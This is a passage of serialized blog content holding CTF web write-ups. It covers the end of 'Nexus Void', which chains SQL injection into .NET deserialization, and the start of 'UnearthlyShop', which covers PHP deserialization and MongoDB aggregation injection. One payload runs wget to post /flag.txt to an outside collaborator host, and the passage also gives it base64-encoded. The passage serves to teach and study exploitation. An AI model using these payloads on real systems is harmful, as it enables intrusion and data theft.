So, our goal now is to exploit deserialization with an instance of this class where we have set the command with our payload.",{"type":33,"tag":47,"props":39842,"children":39843},{},[39844],{"type":38,"value":39845},"This is what we will see in the next chapter.",{"type":33,"tag":40,"props":39847,"children":39849},{"id":39848},"exploitation",[39850],{"type":38,"value":39851},"Exploitation",{"type":33,"tag":47,"props":39853,"children":39854},{},[39855],{"type":38,"value":39856},"We have SQL injection vulnerabilities on each query, an unsafe deserialization from a database result allowing us to achieve remote code execution (RCE). Therefore, we can exploit this SQLi to our advantage for RCE.",{"type":33,"tag":88,"props":39858,"children":39860},{"id":39859},"create-a-serialized-payload",[39861],{"type":38,"value":39862},"Create a serialized payload",{"type":33,"tag":47,"props":39864,"children":39865},{},[39866,39868,39873],{"type":38,"value":39867},"To begin, we need to create a serialized payload that will contain an instance of the ",{"type":33,"tag":105,"props":39869,"children":39871},{"className":39870},[],[39872],{"type":38,"value":39114},{"type":38,"value":39874}," class, which will set a value to the command.",{"type":33,"tag":47,"props":39876,"children":39877},{},[39878],{"type":38,"value":39879},"Our payload will be as follows:",{"type":33,"tag":114,"props":39881,"children":39882},{"lang":633},[39883],{"type":33,"tag":119,"props":39884,"children":39886},{"code":39885,"language":633,"meta":8,"className":637,"style":8},"{\n\"$type\": \"Nexus_Void.Helpers.StatusCheckHelper, Nexus_Void\",\n\"command\": \"wget  --header='Content-type: multipart/form-data boundary=FILEUPLOAD' --post-file /flag.txt 
http://aesz1k6cgyylzco4zrdoyv12ltrqfq3f.oastify.com\"\n}\n",[39887],{"type":33,"tag":105,"props":39888,"children":39889},{"__ignoreMap":8},[39890,39897,39933,39965],{"type":33,"tag":128,"props":39891,"children":39892},{"class":130,"line":131},[39893],{"type":33,"tag":128,"props":39894,"children":39895},{"style":312},[39896],{"type":38,"value":650},{"type":33,"tag":128,"props":39898,"children":39899},{"class":130,"line":362},[39900,39904,39908,39912,39916,39920,39925,39929],{"type":33,"tag":128,"props":39901,"children":39902},{"style":656},[39903],{"type":38,"value":669},{"type":33,"tag":128,"props":39905,"children":39906},{"style":437},[39907],{"type":38,"value":38619},{"type":33,"tag":128,"props":39909,"children":39910},{"style":656},[39911],{"type":38,"value":669},{"type":33,"tag":128,"props":39913,"children":39914},{"style":312},[39915],{"type":38,"value":284},{"type":33,"tag":128,"props":39917,"children":39918},{"style":676},[39919],{"type":38,"value":679},{"type":33,"tag":128,"props":39921,"children":39922},{"style":140},[39923],{"type":38,"value":39924},"Nexus_Void.Helpers.StatusCheckHelper, 
Nexus_Void",{"type":33,"tag":128,"props":39926,"children":39927},{"style":676},[39928],{"type":38,"value":669},{"type":33,"tag":128,"props":39930,"children":39931},{"style":312},[39932],{"type":38,"value":693},{"type":33,"tag":128,"props":39934,"children":39935},{"class":130,"line":403},[39936,39940,39944,39948,39952,39956,39961],{"type":33,"tag":128,"props":39937,"children":39938},{"style":656},[39939],{"type":38,"value":669},{"type":33,"tag":128,"props":39941,"children":39942},{"style":437},[39943],{"type":38,"value":38795},{"type":33,"tag":128,"props":39945,"children":39946},{"style":656},[39947],{"type":38,"value":669},{"type":33,"tag":128,"props":39949,"children":39950},{"style":312},[39951],{"type":38,"value":284},{"type":33,"tag":128,"props":39953,"children":39954},{"style":676},[39955],{"type":38,"value":679},{"type":33,"tag":128,"props":39957,"children":39958},{"style":140},[39959],{"type":38,"value":39960},"wget  --header='Content-type: multipart/form-data boundary=FILEUPLOAD' --post-file /flag.txt http://aesz1k6cgyylzco4zrdoyv12ltrqfq3f.oastify.com",{"type":33,"tag":128,"props":39962,"children":39963},{"style":676},[39964],{"type":38,"value":836},{"type":33,"tag":128,"props":39966,"children":39967},{"class":130,"line":739},[39968],{"type":33,"tag":128,"props":39969,"children":39970},{"style":312},[39971],{"type":38,"value":854},{"type":33,"tag":47,"props":39973,"children":39974},{},[39975],{"type":38,"value":39976},"There is some detail about this payload:",{"type":33,"tag":32400,"props":39978,"children":39981},{"width":39979,"src":39980},950,"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704406996/writeups/nexus-void/payload_detail.webp",[],{"type":33,"tag":47,"props":39983,"children":39984},{},[39985,39987,39992,39994,39999],{"type":38,"value":39986},"The value of ",{"type":33,"tag":105,"props":39988,"children":39990},{"className":39989},[],[39991],{"type":38,"value":38619},{"type":38,"value":39993}," will allow us to target the instance of the 
class that will be deserialized. Then we set the attribute ",{"type":33,"tag":105,"props":39995,"children":39997},{"className":39996},[],[39998],{"type":38,"value":38795},{"type":38,"value":40000}," of our instance with our command to be executed.",{"type":33,"tag":114,"props":40002,"children":40003},{"lang":25649},[40004],{"type":33,"tag":119,"props":40005,"children":40007},{"code":40006},"ewoiJHR5cGUiOiAiTmV4dXNfVm9pZC5IZWxwZXJzLlN0YXR1c0NoZWNrSGVscGVyLCBOZXh1c19Wb2lkIiwKImNvbW1hbmQiOiAid2dldCAgLS1oZWFkZXI9Q29udGVudC10eXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhIGJvdW5kYXJ5PUZJTEVVUExPQUQgLS1wb3N0LWZpbGUgL2ZsYWcudHh0IFtodHRwOi8vYWVzejFrNmNneXlsemNvNHpyZG95djEybHRycWZxM2Yub2FzdGlmeS5jb21dKGh0dHA6Ly9hZXN6MWs2Y2d5eWx6Y280enJkb3l2MTJsdHJxZnEzZi5vYXN0aWZ5LmNvbS8pIgp9Cg==\n",[40008],{"type":33,"tag":105,"props":40009,"children":40010},{"__ignoreMap":8},[40011],{"type":38,"value":40006},{"type":33,"tag":88,"props":40013,"children":40015},{"id":40014},"update-the-database",[40016],{"type":38,"value":40017},"Update the database",{"type":33,"tag":47,"props":40019,"children":40020},{},[40021],{"type":38,"value":40022},"The deserialization is triggered when the Wishlist is retrieved. 
The wishlist is specific to our account, so we need to start by adding a product to our wishlist, the first one for example.",{"type":33,"tag":47,"props":40024,"children":40025},{},[40026],{"type":38,"value":40027},"After adding the product with ID 1 to our wishlist, we need to update the database to change the value of the data for our wishlist.",{"type":33,"tag":75,"props":40029,"children":40031},{"imgSrc":40030},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499801/writeups/nexus-void/favorites_frontend.webp",[],{"type":33,"tag":47,"props":40033,"children":40034},{},[40035],{"type":38,"value":40036},"The associated query is as follows:",{"type":33,"tag":75,"props":40038,"children":40040},{"imgSrc":40039},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499797/writeups/nexus-void/request_add_elmt_wishlist.webp",[],{"type":33,"tag":47,"props":40042,"children":40043},{},[40044],{"type":38,"value":40045},"If we go to the wishlist page, we can see the product added to the list.",{"type":33,"tag":75,"props":40047,"children":40049},{"imgSrc":40048},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499793/writeups/nexus-void/wish_list_frontend.webp",[],{"type":33,"tag":47,"props":40051,"children":40052},{},[40053,40055,40060],{"type":38,"value":40054},"It is this product that we will pollute. 
If we remember the deserialization part, it executes it from the ",{"type":33,"tag":105,"props":40056,"children":40058},{"className":40057},[],[40059],{"type":38,"value":2815},{"type":38,"value":40061}," value of the wishlist result.",{"type":33,"tag":114,"props":40063,"children":40064},{"lang":35074},[40065],{"type":33,"tag":119,"props":40066,"children":40068},{"code":40067,"language":35074,"meta":8,"className":35079,"style":8},"List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n",[40069],{"type":33,"tag":105,"props":40070,"children":40071},{"__ignoreMap":8},[40072],{"type":33,"tag":128,"props":40073,"children":40074},{"class":130,"line":131},[40075,40079,40083,40087,40091,40095,40099,40103,40107,40111,40115,40119,40123,40127],{"type":33,"tag":128,"props":40076,"children":40077},{"style":30339},[40078],{"type":38,"value":37176},{"type":33,"tag":128,"props":40080,"children":40081},{"style":312},[40082],{"type":38,"value":5977},{"type":33,"tag":128,"props":40084,"children":40085},{"style":30339},[40086],{"type":38,"value":35788},{"type":33,"tag":128,"props":40088,"children":40089},{"style":312},[40090],{"type":38,"value":6054},{"type":33,"tag":128,"props":40092,"children":40093},{"style":135},[40094],{"type":38,"value":35797},{"type":33,"tag":128,"props":40096,"children":40097},{"style":312},[40098],{"type":38,"value":5657},{"type":33,"tag":128,"props":40100,"children":40101},{"style":306},[40102],{"type":38,"value":35806},{"type":33,"tag":128,"props":40104,"children":40105},{"style":312},[40106],{"type":38,"value":215},{"type":33,"tag":128,"props":40108,"children":40109},{"style":135},[40110],{"type":38,"value":35815},{"type":33,"tag":128,"props":40112,"children":40113},{"style":312},[40114],{"type":38,"value":5566},{"type":33,"tag":128,"props":40116,"children":40117},{"style":306},[40118],{"type":38,"value":35712},{"type":33,"tag":128,"props":40120,"children":40121},{"style":312},[40122],{"type":38,"value":215},{"type":33,"tag":128,"pro
ps":40124,"children":40125},{"style":306},[40126],{"type":38,"value":2815},{"type":33,"tag":128,"props":40128,"children":40129},{"style":312},[40130],{"type":38,"value":5815},{"type":33,"tag":47,"props":40132,"children":40133},{},[40134,40136,40141],{"type":38,"value":40135},"So we need to update the ",{"type":33,"tag":105,"props":40137,"children":40139},{"className":40138},[],[40140],{"type":38,"value":2815},{"type":38,"value":40142}," value of our wishlist to contain our serialized payload.",{"type":33,"tag":47,"props":40144,"children":40145},{},[40146],{"type":38,"value":40147},"We can therefore use our previous request.",{"type":33,"tag":47,"props":40149,"children":40150},{},[40151],{"type":33,"tag":2572,"props":40152,"children":40153},{},[40154],{"type":38,"value":40155},"Note: It is possible to chain SQL queries in our injection.",{"type":33,"tag":75,"props":40157,"children":40159},{"imgSrc":40158},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499778/writeups/nexus-void/request_exploit_detail.webp",[],{"type":33,"tag":47,"props":40161,"children":40162},{},[40163],{"type":38,"value":40164},"After that, we can see in the docker logs that we have successfully executed our update query.",{"type":33,"tag":75,"props":40166,"children":40168},{"imgSrc":40167},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499783/writeups/nexus-void/docker_log.webp",[],{"type":33,"tag":47,"props":40170,"children":40171},{},[40172],{"type":38,"value":40173},"We just need to refresh the page that lists our wishlist, which will execute our order. 
We can then see that our collaborator has received the flag.",{"type":33,"tag":75,"props":40175,"children":40177},{"imgSrc":40176},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704499788/writeups/nexus-void/flag_collab.webp",[],{"type":33,"tag":5227,"props":40179,"children":40180},{},[40181],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":40183},[40184,40185,40186,40187],{"id":42,"depth":362,"text":45},{"id":35058,"depth":362,"text":35061},{"id":36591,"depth":362,"text":36594},{"id":39848,"depth":362,"text":39851},"content:writeups:nexus-void.md","writeups/nexus-void.md","writeups/nexus-void",{"_path":40192,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":40193,"description":8,"head":40194,"body":40212,"_type":5240,"_id":43346,"_source":5242,"_file":43347,"_stem":43348,"_extension":5245},"/writeups/unearthly-shop","UnearthlyShop",{"title":40193,"description":40195,"keywords":40196,"slug":40197,"image":40198,"date":40199,"meta":40200},"UnearthlyShop challenge, was a hard web challenge from HTB cyber apocalypse. 
It was about php gadgets, php deserialization and autoload function.","web,php,deserialization,gadgets,autoload","unearthly-shop","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743778740/writeups/cyber_appo_2023.webp","2023-03-23",[40201,40202,40203,40204,40205,40207,40208,40210],{"og:image":40198},{"og:title":40193},{"og:description":40195},{"og:type":21},{"og:url":40206},"https://owalid.com/unearthly-shop",{"description":40195},{"title":40209},"UnearthlyShop writeup",{"keywords":40211},"web,php,deserialization,gadgets,autoload,htb,ctf",{"type":30,"children":40213,"toc":43337},[40214,40219,40223,40228,40233,40253,40258,40408,40413,40548,40552,40557,40562,40580,40585,40590,40596,40601,40606,40617,40622,40627,40748,40753,40766,40770,41189,41194,41199,41316,41321,41325,41331,41336,41480,41485,41490,41718,41723,41728,42044,42052,42057,42062,42268,42280,42286,42299,42311,42317,42330,42335,42340,42344,42352,42357,42362,42367,42960,42965,42970,42975,43112,43117,43174,43179,43190,43195,43206,43211,43216,43227,43236,43244,43249,43254,43260,43265,43270,43275,43285,43297,43308,43313,43324,43329,43333],{"type":33,"tag":34,"props":40215,"children":40217},{"id":40216},"unearthlyshop",[40218],{"type":38,"value":40193},{"type":33,"tag":40,"props":40220,"children":40221},{"id":42},[40222],{"type":38,"value":45},{"type":33,"tag":47,"props":40224,"children":40225},{},[40226],{"type":38,"value":40227},"UnearthlyShop was a web hard challenge from HTB cyber apocalypse 2023.",{"type":33,"tag":47,"props":40229,"children":40230},{},[40231],{"type":38,"value":40232},"This challenge was in white box, meaning we have access to the source code of the website.",{"type":33,"tag":47,"props":40234,"children":40235},{},[40236,40238,40244,40246,40251],{"type":38,"value":40237},"We can see in the DockerFile that the flag is stored in the directory ",{"type":33,"tag":105,"props":40239,"children":40241},{"className":40240},[],[40242],{"type":38,"value":40243},"/root",{"type":38,"value":40245}," 
and that they give us permission on an executable file called ",{"type":33,"tag":105,"props":40247,"children":40249},{"className":40248},[],[40250],{"type":38,"value":5294},{"type":38,"value":40252},". This gives us a hint on the type of attack we need to perform.",{"type":33,"tag":47,"props":40254,"children":40255},{},[40256],{"type":38,"value":40257},"In other words, we need to have a RCE (Remote Code Execution). Without this, we will not be able to read the flag.",{"type":33,"tag":114,"props":40259,"children":40260},{"lang":9966},[40261],{"type":33,"tag":119,"props":40262,"children":40264},{"code":40263,"language":9966,"meta":8,"className":22917,"style":8},"...\n# Setup user\nRUN useradd www\n\n# Add readflag binary\nCOPY flag.txt /root/flag\nCOPY config/readflag.c /\nRUN gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c\n\n# Copy challenge files\nCOPY challenge /www\n\n# Setup permissions\nRUN chown -R www:www /var/lib/nginx\n...\n",[40265],{"type":33,"tag":105,"props":40266,"children":40267},{"__ignoreMap":8},[40268,40276,40284,40296,40303,40311,40323,40335,40347,40354,40362,40374,40381,40389,40401],{"type":33,"tag":128,"props":40269,"children":40270},{"class":130,"line":131},[40271],{"type":33,"tag":128,"props":40272,"children":40273},{"style":323},[40274],{"type":38,"value":40275},"...\n",{"type":33,"tag":128,"props":40277,"children":40278},{"class":130,"line":362},[40279],{"type":33,"tag":128,"props":40280,"children":40281},{"style":5541},[40282],{"type":38,"value":40283},"# Setup user\n",{"type":33,"tag":128,"props":40285,"children":40286},{"class":130,"line":403},[40287,40291],{"type":33,"tag":128,"props":40288,"children":40289},{"style":1576},[40290],{"type":38,"value":22949},{"type":33,"tag":128,"props":40292,"children":40293},{"style":323},[40294],{"type":38,"value":40295}," useradd 
www\n",{"type":33,"tag":128,"props":40297,"children":40298},{"class":130,"line":739},[40299],{"type":33,"tag":128,"props":40300,"children":40301},{"emptyLinePlaceholder":896},[40302],{"type":38,"value":899},{"type":33,"tag":128,"props":40304,"children":40305},{"class":130,"line":765},[40306],{"type":33,"tag":128,"props":40307,"children":40308},{"style":5541},[40309],{"type":38,"value":40310},"# Add readflag binary\n",{"type":33,"tag":128,"props":40312,"children":40313},{"class":130,"line":804},[40314,40318],{"type":33,"tag":128,"props":40315,"children":40316},{"style":1576},[40317],{"type":38,"value":23093},{"type":33,"tag":128,"props":40319,"children":40320},{"style":323},[40321],{"type":38,"value":40322}," flag.txt /root/flag\n",{"type":33,"tag":128,"props":40324,"children":40325},{"class":130,"line":839},[40326,40330],{"type":33,"tag":128,"props":40327,"children":40328},{"style":1576},[40329],{"type":38,"value":23093},{"type":33,"tag":128,"props":40331,"children":40332},{"style":323},[40333],{"type":38,"value":40334}," config/readflag.c /\n",{"type":33,"tag":128,"props":40336,"children":40337},{"class":130,"line":848},[40338,40342],{"type":33,"tag":128,"props":40339,"children":40340},{"style":1576},[40341],{"type":38,"value":22949},{"type":33,"tag":128,"props":40343,"children":40344},{"style":323},[40345],{"type":38,"value":40346}," gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c\n",{"type":33,"tag":128,"props":40348,"children":40349},{"class":130,"line":976},[40350],{"type":33,"tag":128,"props":40351,"children":40352},{"emptyLinePlaceholder":896},[40353],{"type":38,"value":899},{"type":33,"tag":128,"props":40355,"children":40356},{"class":130,"line":988},[40357],{"type":33,"tag":128,"props":40358,"children":40359},{"style":5541},[40360],{"type":38,"value":40361},"# Copy challenge 
files\n",{"type":33,"tag":128,"props":40363,"children":40364},{"class":130,"line":1001},[40365,40369],{"type":33,"tag":128,"props":40366,"children":40367},{"style":1576},[40368],{"type":38,"value":23093},{"type":33,"tag":128,"props":40370,"children":40371},{"style":323},[40372],{"type":38,"value":40373}," challenge /www\n",{"type":33,"tag":128,"props":40375,"children":40376},{"class":130,"line":1014},[40377],{"type":33,"tag":128,"props":40378,"children":40379},{"emptyLinePlaceholder":896},[40380],{"type":38,"value":899},{"type":33,"tag":128,"props":40382,"children":40383},{"class":130,"line":1026},[40384],{"type":33,"tag":128,"props":40385,"children":40386},{"style":5541},[40387],{"type":38,"value":40388},"# Setup permissions\n",{"type":33,"tag":128,"props":40390,"children":40391},{"class":130,"line":1038},[40392,40396],{"type":33,"tag":128,"props":40393,"children":40394},{"style":1576},[40395],{"type":38,"value":22949},{"type":33,"tag":128,"props":40397,"children":40398},{"style":323},[40399],{"type":38,"value":40400}," chown -R www:www /var/lib/nginx\n",{"type":33,"tag":128,"props":40402,"children":40403},{"class":130,"line":1051},[40404],{"type":33,"tag":128,"props":40405,"children":40406},{"style":323},[40407],{"type":38,"value":40275},{"type":33,"tag":47,"props":40409,"children":40410},{},[40411],{"type":38,"value":40412},"And this is the readflag.c file:",{"type":33,"tag":114,"props":40414,"children":40415},{"lang":330},[40416],{"type":33,"tag":119,"props":40417,"children":40419},{"code":40418,"language":330,"meta":8,"className":9071,"style":8},"#include\u003Cunistd.h>\n#include\u003Cstdlib.h>\nint main()\n{\n    setuid(0);\n    system(\"cat 
/root/flag\");\n}\n",[40420],{"type":33,"tag":105,"props":40421,"children":40422},{"__ignoreMap":8},[40423,40446,40469,40485,40492,40512,40541],{"type":33,"tag":128,"props":40424,"children":40425},{"class":130,"line":131},[40426,40430,40434,40438,40442],{"type":33,"tag":128,"props":40427,"children":40428},{"style":312},[40429],{"type":38,"value":9092},{"type":33,"tag":128,"props":40431,"children":40432},{"style":1576},[40433],{"type":38,"value":9097},{"type":33,"tag":128,"props":40435,"children":40436},{"style":676},[40437],{"type":38,"value":5977},{"type":33,"tag":128,"props":40439,"children":40440},{"style":140},[40441],{"type":38,"value":9203},{"type":33,"tag":128,"props":40443,"children":40444},{"style":676},[40445],{"type":38,"value":6097},{"type":33,"tag":128,"props":40447,"children":40448},{"class":130,"line":362},[40449,40453,40457,40461,40465],{"type":33,"tag":128,"props":40450,"children":40451},{"style":312},[40452],{"type":38,"value":9092},{"type":33,"tag":128,"props":40454,"children":40455},{"style":1576},[40456],{"type":38,"value":9097},{"type":33,"tag":128,"props":40458,"children":40459},{"style":676},[40460],{"type":38,"value":5977},{"type":33,"tag":128,"props":40462,"children":40463},{"style":140},[40464],{"type":38,"value":9179},{"type":33,"tag":128,"props":40466,"children":40467},{"style":676},[40468],{"type":38,"value":6097},{"type":33,"tag":128,"props":40470,"children":40471},{"class":130,"line":403},[40472,40477,40481],{"type":33,"tag":128,"props":40473,"children":40474},{"style":300},[40475],{"type":38,"value":40476},"int",{"type":33,"tag":128,"props":40478,"children":40479},{"style":135},[40480],{"type":38,"value":15433},{"type":33,"tag":128,"props":40482,"children":40483},{"style":312},[40484],{"type":38,"value":7857},{"type":33,"tag":128,"props":40486,"children":40487},{"class":130,"line":739},[40488],{"type":33,"tag":128,"props":40489,"children":40490},{"style":312},[40491],{"type":38,"value":650},{"type":33,"tag":128,"props":40493,"childre
n":40494},{"class":130,"line":765},[40495,40500,40504,40508],{"type":33,"tag":128,"props":40496,"children":40497},{"style":135},[40498],{"type":38,"value":40499},"    setuid",{"type":33,"tag":128,"props":40501,"children":40502},{"style":312},[40503],{"type":38,"value":5566},{"type":33,"tag":128,"props":40505,"children":40506},{"style":523},[40507],{"type":38,"value":10442},{"type":33,"tag":128,"props":40509,"children":40510},{"style":312},[40511],{"type":38,"value":5815},{"type":33,"tag":128,"props":40513,"children":40514},{"class":130,"line":804},[40515,40520,40524,40528,40533,40537],{"type":33,"tag":128,"props":40516,"children":40517},{"style":135},[40518],{"type":38,"value":40519},"    system",{"type":33,"tag":128,"props":40521,"children":40522},{"style":312},[40523],{"type":38,"value":5566},{"type":33,"tag":128,"props":40525,"children":40526},{"style":676},[40527],{"type":38,"value":669},{"type":33,"tag":128,"props":40529,"children":40530},{"style":140},[40531],{"type":38,"value":40532},"cat /root/flag",{"type":33,"tag":128,"props":40534,"children":40535},{"style":676},[40536],{"type":38,"value":669},{"type":33,"tag":128,"props":40538,"children":40539},{"style":312},[40540],{"type":38,"value":5815},{"type":33,"tag":128,"props":40542,"children":40543},{"class":130,"line":839},[40544],{"type":33,"tag":128,"props":40545,"children":40546},{"style":312},[40547],{"type":38,"value":854},{"type":33,"tag":40,"props":40549,"children":40550},{"id":22881},[40551],{"type":38,"value":22884},{"type":33,"tag":47,"props":40553,"children":40554},{},[40555],{"type":38,"value":40556},"The application follows the same architecture as an ecommerce website, with a store for customers and a back office for administrators.",{"type":33,"tag":47,"props":40558,"children":40559},{},[40560],{"type":38,"value":40561},"The application has three services: two PHP-FPM services and a mongodb 
database.",{"type":33,"tag":239,"props":40563,"children":40564},{},[40565,40570,40575],{"type":33,"tag":243,"props":40566,"children":40567},{},[40568],{"type":38,"value":40569},"The first PHP-FPM service is used to serve the website. (store)",{"type":33,"tag":243,"props":40571,"children":40572},{},[40573],{"type":38,"value":40574},"The second PHP-FPM service is used to serve the back office. (admin)",{"type":33,"tag":243,"props":40576,"children":40577},{},[40578],{"type":38,"value":40579},"The mongodb database is used to store information about users, products, orders, etc.",{"type":33,"tag":47,"props":40581,"children":40582},{},[40583],{"type":38,"value":40584},"This is the architecture of the application:",{"type":33,"tag":32400,"props":40586,"children":40589},{"width":40587,"src":40588},1031,"https://user-images.githubusercontent.com/28403617/227585032-3b53b421-bf05-4a75-98ad-1bf1a662e979.png",[],{"type":33,"tag":40,"props":40591,"children":40593},{"id":40592},"first-nosqli",[40594],{"type":38,"value":40595},"First NoSQLI",{"type":33,"tag":47,"props":40597,"children":40598},{},[40599],{"type":38,"value":40600},"For now, we only have access to the frontend part, the backoffice part is protected by a password.",{"type":33,"tag":47,"props":40602,"children":40603},{},[40604],{"type":38,"value":40605},"One request that caught our attention more than others:",{"type":33,"tag":114,"props":40607,"children":40608},{},[40609],{"type":33,"tag":119,"props":40610,"children":40612},{"code":40611},"POST /api/products HTTP/1.1\nHost: localhost:1337\nContent-Type: application/json\nContent-Length: 29\n\n[{\"$match\":{\"instock\":true}}]\n",[40613],{"type":33,"tag":105,"props":40614,"children":40615},{"__ignoreMap":8},[40616],{"type":38,"value":40611},{"type":33,"tag":47,"props":40618,"children":40619},{},[40620],{"type":38,"value":40621},"$match is a MongoDB aggregation pipeline operator that matches all documents that meet the specified 
conditions.",{"type":33,"tag":47,"props":40623,"children":40624},{},[40625],{"type":38,"value":40626},"If we look at the code, we can see that the parameter is not protected to inject MongoDB code.",{"type":33,"tag":114,"props":40628,"children":40630},{"land":40629},"php",[40631],{"type":33,"tag":119,"props":40632,"children":40635},{"code":40633,"language":40629,"meta":8,"className":40634,"style":8},"public function getProducts($query)\n{\n    return $this->database->query('products', $query);\n}\n","language-php shiki shiki-themes vitesse-dark",[40636],{"type":33,"tag":105,"props":40637,"children":40638},{"__ignoreMap":8},[40639,40668,40675,40741],{"type":33,"tag":128,"props":40640,"children":40641},{"class":130,"line":131},[40642,40646,40650,40655,40660,40664],{"type":33,"tag":128,"props":40643,"children":40644},{"style":300},[40645],{"type":38,"value":25953},{"type":33,"tag":128,"props":40647,"children":40648},{"style":300},[40649],{"type":38,"value":15428},{"type":33,"tag":128,"props":40651,"children":40652},{"style":135},[40653],{"type":38,"value":40654}," getProducts",{"type":33,"tag":128,"props":40656,"children":40657},{"style":312},[40658],{"type":38,"value":40659},"($",{"type":33,"tag":128,"props":40661,"children":40662},{"style":306},[40663],{"type":38,"value":5810},{"type":33,"tag":128,"props":40665,"children":40666},{"style":312},[40667],{"type":38,"value":2427},{"type":33,"tag":128,"props":40669,"children":40670},{"class":130,"line":362},[40671],{"type":33,"tag":128,"props":40672,"children":40673},{"style":312},[40674],{"type":38,"value":650},{"type":33,"tag":128,"props":40676,"children":40677},{"class":130,"line":403},[40678,40682,40687,40691,40696,40701,40705,40709,40713,40717,40721,40725,40729,40733,40737],{"type":33,"tag":128,"props":40679,"children":40680},{"style":1576},[40681],{"type":38,"value":6810},{"type":33,"tag":128,"props":40683,"children":40684},{"style":312},[40685],{"type":38,"value":40686}," 
$",{"type":33,"tag":128,"props":40688,"children":40689},{"style":151},[40690],{"type":38,"value":3721},{"type":33,"tag":128,"props":40692,"children":40693},{"style":300},[40694],{"type":38,"value":40695},"->",{"type":33,"tag":128,"props":40697,"children":40698},{"style":306},[40699],{"type":38,"value":40700},"database",{"type":33,"tag":128,"props":40702,"children":40703},{"style":300},[40704],{"type":38,"value":40695},{"type":33,"tag":128,"props":40706,"children":40707},{"style":135},[40708],{"type":38,"value":5810},{"type":33,"tag":128,"props":40710,"children":40711},{"style":312},[40712],{"type":38,"value":5566},{"type":33,"tag":128,"props":40714,"children":40715},{"style":676},[40716],{"type":38,"value":6040},{"type":33,"tag":128,"props":40718,"children":40719},{"style":140},[40720],{"type":38,"value":36071},{"type":33,"tag":128,"props":40722,"children":40723},{"style":676},[40724],{"type":38,"value":6040},{"type":33,"tag":128,"props":40726,"children":40727},{"style":312},[40728],{"type":38,"value":5584},{"type":33,"tag":128,"props":40730,"children":40731},{"style":312},[40732],{"type":38,"value":40686},{"type":33,"tag":128,"props":40734,"children":40735},{"style":306},[40736],{"type":38,"value":5810},{"type":33,"tag":128,"props":40738,"children":40739},{"style":312},[40740],{"type":38,"value":5815},{"type":33,"tag":128,"props":40742,"children":40743},{"class":130,"line":739},[40744],{"type":33,"tag":128,"props":40745,"children":40746},{"style":312},[40747],{"type":38,"value":854},{"type":33,"tag":47,"props":40749,"children":40750},{},[40751],{"type":38,"value":40752},"It is therefore possible to inject MongoDB code from this request.",{"type":33,"tag":47,"props":40754,"children":40755},{},[40756,40757,40764],{"type":38,"value":461},{"type":33,"tag":53,"props":40758,"children":40761},{"href":40759,"rel":40760},"https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/",[57],[40762],{"type":38,"value":40763},"$lookup",{"type":38,"value":40765},", 
it is possible to retrieve data from another MongoDB collection.",{"type":33,"tag":32400,"props":40767,"children":40769},{"width":40587,"src":40768},"https://user-images.githubusercontent.com/28403617/227582895-e91a7105-203e-4db9-8de0-fac60f5a1a35.png",[],{"type":33,"tag":114,"props":40771,"children":40772},{"land":633},[40773],{"type":33,"tag":119,"props":40774,"children":40776},{"code":40775,"language":633,"meta":8,"className":637,"style":8},"[\n  {\n    \"$lookup\": {\n      \"from\": \"users\", \u003C- This is the collection we want to retrieve data from\n      \"localField\": \"aaaaa\", \u003C- This is the field from the input collection\n      \"foreignField\": \"aaaaa\", \u003C- This is the field that the documents in the from collection must match\n      \"as\": \"adminData\" \u003C- This is the name of the new field that will contain the data\n    }\n  }\n]\n",[40777],{"type":33,"tag":105,"props":40778,"children":40779},{"__ignoreMap":8},[40780,40788,40796,40819,40905,40980,41077,41168,41175,41182],{"type":33,"tag":128,"props":40781,"children":40782},{"class":130,"line":131},[40783],{"type":33,"tag":128,"props":40784,"children":40785},{"style":312},[40786],{"type":38,"value":40787},"[\n",{"type":33,"tag":128,"props":40789,"children":40790},{"class":130,"line":362},[40791],{"type":33,"tag":128,"props":40792,"children":40793},{"style":312},[40794],{"type":38,"value":40795},"  
{\n",{"type":33,"tag":128,"props":40797,"children":40798},{"class":130,"line":403},[40799,40803,40807,40811,40815],{"type":33,"tag":128,"props":40800,"children":40801},{"style":656},[40802],{"type":38,"value":771},{"type":33,"tag":128,"props":40804,"children":40805},{"style":437},[40806],{"type":38,"value":40763},{"type":33,"tag":128,"props":40808,"children":40809},{"style":656},[40810],{"type":38,"value":669},{"type":33,"tag":128,"props":40812,"children":40813},{"style":312},[40814],{"type":38,"value":284},{"type":33,"tag":128,"props":40816,"children":40817},{"style":312},[40818],{"type":38,"value":762},{"type":33,"tag":128,"props":40820,"children":40821},{"class":130,"line":739},[40822,40826,40830,40834,40838,40842,40846,40850,40854,40859,40864,40868,40872,40877,40882,40887,40891,40896,40900],{"type":33,"tag":128,"props":40823,"children":40824},{"style":656},[40825],{"type":38,"value":12707},{"type":33,"tag":128,"props":40827,"children":40828},{"style":437},[40829],{"type":38,"value":34454},{"type":33,"tag":128,"props":40831,"children":40832},{"style":656},[40833],{"type":38,"value":669},{"type":33,"tag":128,"props":40835,"children":40836},{"style":312},[40837],{"type":38,"value":284},{"type":33,"tag":128,"props":40839,"children":40840},{"style":676},[40841],{"type":38,"value":679},{"type":33,"tag":128,"props":40843,"children":40844},{"style":140},[40845],{"type":38,"value":30376},{"type":33,"tag":128,"props":40847,"children":40848},{"style":676},[40849],{"type":38,"value":669},{"type":33,"tag":128,"props":40851,"children":40852},{"style":312},[40853],{"type":38,"value":5584},{"type":33,"tag":128,"props":40855,"children":40856},{"style":20986},[40857],{"type":38,"value":40858}," \u003C-",{"type":33,"tag":128,"props":40860,"children":40861},{"style":20986},[40862],{"type":38,"value":40863}," 
